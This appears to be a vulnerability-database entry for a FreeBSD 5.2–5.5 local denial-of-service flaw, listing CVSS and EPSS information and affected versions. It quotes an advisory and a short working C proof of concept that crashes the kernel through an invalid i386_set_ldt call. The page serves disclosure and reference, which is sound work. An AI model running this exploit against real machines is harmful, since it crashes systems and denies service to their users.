Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.9 |
|
AV:L/AC:L/Au:N/C:N/I:N/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 28648
Publication date : 2006-09-22 22h00 +00:00
Author : Adriano Lima
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/20158/info
FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers.
An attacker may leverage these issues to cause the affected computer to crash, denying service to legitimate users.
Versions 5.2 through 5.5 are vulnerable to these issues; other versions may also be affected.
#include <stdio.h>
#include <stdlib.h>
#include <machine/segments.h>
#include <machine/sysarch.h>
int main(int argc,char **argv){
if(i386_set_ldt(LUDATA_SEL+1,NULL,-1)==-1){
perror("i386_set_ldt");
exit(EXIT_FAILURE);
}
exit(EXIT_FAILURE);
}
Products Mentioned
Configuraton 0
Freebsd>>Freebsd >> Version To (including) 5.5
Freebsd>>Freebsd >> Version 5.2
Freebsd>>Freebsd >> Version 5.2.1
Freebsd>>Freebsd >> Version 5.3
Freebsd>>Freebsd >> Version 5.4
References